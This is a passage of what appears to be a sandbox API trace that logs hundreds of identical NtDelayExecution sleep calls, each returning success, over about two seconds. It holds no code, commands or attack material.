(Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.380] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.382] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.385] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.386] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.388] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.389] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.394] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.395] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.397] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.398] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.400] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.401] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.403] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.404] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.406] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.407] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.415] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.416] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.418] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.419] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.422] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.423] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.424] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.426] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.427] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.434] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.435] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.437] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.438] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.440] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.441] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.443] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.444] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.447] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.449] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.450] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.452] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.453] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.455] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.456] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.458] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.459] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.461] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.464] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.467] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.469] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.475] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.476] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.479] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.481] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.482] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.484] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.485] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.487] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.489] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.491] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.493] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.495] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.496] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.498] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.500] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.501] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.502] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.505] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.507] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.508] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.515] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.517] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.518] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.520] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.522] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.523] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.525] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.527] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.528] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.529] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.531] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.532] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.534] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.536] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.537] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.539] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.542] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.543] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.545] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.548] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.550] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.551] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.552] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.558] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.559] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.560] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.562] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.563] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.565] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.566] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.568] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.569] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.571] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.572] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.574] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.575] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.577] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.578] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.580] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.581] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.583] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.584] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.586] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.587] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.589] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.590] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.592] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.595] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.601] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.602] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.604] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.605] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.607] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.614] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.616] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.617] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.619] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.620] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.623] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.624] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.625] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.627] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.634] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.635] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.644] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.645] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.647] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.651] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.653] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.654] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.656] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.657] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.658] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.660] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.661] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.663] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.664] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.683] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.684] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.685] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.687] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.689] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.690] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.692] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.693] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.695] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.696] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.698] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.699] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.701] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.703] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.704] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.706] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.709] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.711] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.731] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.825] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.860] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.876] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.908] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.931] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.945] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.960] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.977] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0154.994] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.008] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.010] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.031] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.045] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.110] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.112] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.145] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.161] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.176] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.192] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.234] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.247] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.261] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.277] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.292] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.313] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.330] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.351] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.361] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.376] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.392] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.408] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.411] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.429] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.445] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.468] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.477] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.492] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.510] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.549] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.561] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.579] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.593] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.608] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.610] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.611] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.613] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.630] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.648] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.670] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.677] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.692] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.708] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.710] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.712] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.713] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.730] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.745] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.761] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.779] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.792] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.808] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.810] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.811] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.813] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.830] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.845] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.861] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.878] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.892] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.909] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.911] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.912] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.914] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.930] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.951] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.961] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.979] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0155.993] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.009] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.011] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.012] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.014] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.030] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.046] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.061] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.079] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.092] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.114] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.130] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.146] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.162] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.179] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.193] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.228] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.230] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.256] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.262] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.279] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.293] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.309] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.311] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.312] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.314] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.331] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.346] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.362] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.384] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.393] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.409] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.412] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.413] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.420] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.430] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.446] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.462] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.478] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.499] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.509] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.511] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.512] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.514] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.530] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.546] NtDelayExecution (Alertable=0, Interval=0x87fec0*=-11000000) returned 0x0 [0156.562] NtDelayExecution 